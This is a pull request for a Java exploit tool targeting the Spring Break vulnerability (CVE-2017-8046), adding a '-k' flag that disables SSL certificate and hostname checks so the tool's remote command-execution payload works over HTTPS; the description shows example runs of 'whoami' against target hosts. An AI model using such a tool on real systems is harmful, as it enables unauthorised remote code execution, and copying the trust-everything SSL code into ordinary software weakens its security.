### PR TITLE
Skip SSL Validation

### DIFF
--- a/README.md
+++ b/README.md
@@ -70,6 +70,8 @@ Options:
       Optional. Cookies passed into the request, e.g. authentication cookies.
    -H, --header [custom_header]
       Optional. Custom header passed into the request, e.g. authorization header.
+   -k
+      Skip SSL validation
    --clean
       Optional. Removes error messages in output due to the usage of the
       exploit. It could hide error messages if the request fails for other reasons.

--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -542,6 +542,8 @@ public class SpringBreakCve20178046 {
         System.out.println("      Optional. Cookies passed into the request, e.g. authentication cookies.");
         System.out.println("   -H, --header [custom_header]");
         System.out.println("      Optional. Custom header passed into the request, e.g. authorization header.");
+        System.out.println("   -k");
+        System.out.println("      Skip SSL validation");
         System.out.println("   --clean");
         System.out.println("      Optional. Removes error messages in output due to the usage of the");
         System.out.println("      exploit. It could hide error messages if the request fails for other reasons.");

--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -29,6 +29,10 @@ import org.apache.http.client.HttpClient;
 import org.apache.http.client.methods.HttpPatch;
 import org.apache.http.entity.StringEntity;
 import org.apache.http.impl.client.HttpClientBuilder;
+import org.apache.http.ssl.SSLContextBuilder;
+import org.apache.http.conn.ssl.TrustSelfSignedStrategy;
+import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
+import org.apache.http.conn.ssl.NoopHostnameVerifier;
 
 /**
  * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).
@@ -120,6 +124,11 @@ public class SpringBreakCve20178046 {
     private URI url;
 
     /**
+     * Whether to skipSSL or not, default set to false
+     */
+    private boolean skipSSL;
+
+    /**
      * The command that will be executed on the remote machine.
      */
     private String command;
@@ -172,6 +181,7 @@ public class SpringBreakCve20178046 {
         this.verbose = false;
         this.cleanResponse = false;
         this.errorStream = false;
+        this.skipSSL = false;
     }
 
     /**
@@ -311,7 +321,26 @@ public class SpringBreakCve20178046 {
         System.out.println("[*] Sending payload.");
 
         // Preparing PATCH operation.
-        HttpClient client = HttpClientBuilder.create().build();
+        HttpClientBuilder clientBuilder = HttpClientBuilder.create();
+
+        // Disable SSL Verification
+        if(this.url.getScheme().equalsIgnoreCase("https") && this.skipSSL){
+            try{
+                SSLContextBuilder sslBuilder = new SSLContextBuilder();
+                sslBuilder.loadTrustMaterial(null, new TrustSelfSignedStrategy());
+                // Since certificates contain hostnames, not ip addresses, if we try https://ipAddress
+                // a SSLPeerUnverifiedException would be thrown because hostname in certificate does not match
+                // ip used in https://ipAddress, to avoid that error we need to use the overloaded constructor taking as second arg NoopHostnameVerifier.
+                SSLConnectionSocketFactory sslConnectionFactory = new SSLConnectionSocketFactory(sslBuilder.build(), NoopHostnameVerifier.INSTANCE);
+                clientBuilder.setSSLSocketFactory(sslConnectionFactory);
+            } catch(Exception exception) {
+                // Errors that may be thrown: KeyManagementException, KeyStoreException, NoSuchAlgorithmException, SSLPeerUnverifiedException
+                throw new RuntimeException(exception);
+            }
+        }
+
+        HttpClient client = clientBuilder.build();
+
         HttpPatch patch = new HttpPatch(this.url);
         patch.setHeader("User-Agent", "Mozilla/5.0");
         patch.setHeader("Accept-Language", "en-US,en;q=0.5");
@@ -437,6 +466,10 @@ public class SpringBreakCve20178046 {
         }
 
         this.cookies = cookies;
+    }
+
+    public void setSkipSSL(boolean skipSSL){
+        this.skipSSL = skipSSL;
     }
 
     public void setCustomHeader(String customHeader) {
@@ -573,6 +606,10 @@ public class SpringBreakCve20178046 {
                             throw new IllegalArgumentException("Cookies must be passed, if specified.");
                         }
                         o.setCookies(args[++i]);
+
+                    } else if ("-k".equals(p)) {
+
+                        o.setSkipSSL(true);
 
                     } else if ("-H".equals(p) || "--header".equals(p)) {
 


### PR DESCRIPTION
Nowadays almost any website uses SSL, By default, apache client validates the SSL certificate which results in application crash.
I added the -k option (like cURL) to skip SSL validation. Examples:
`spring-break-2017-8046 -u https://192.168.1.120 -cmd whoami -k`
`spring-break-2017-8046 -u https://app.local -cmd whoami -k`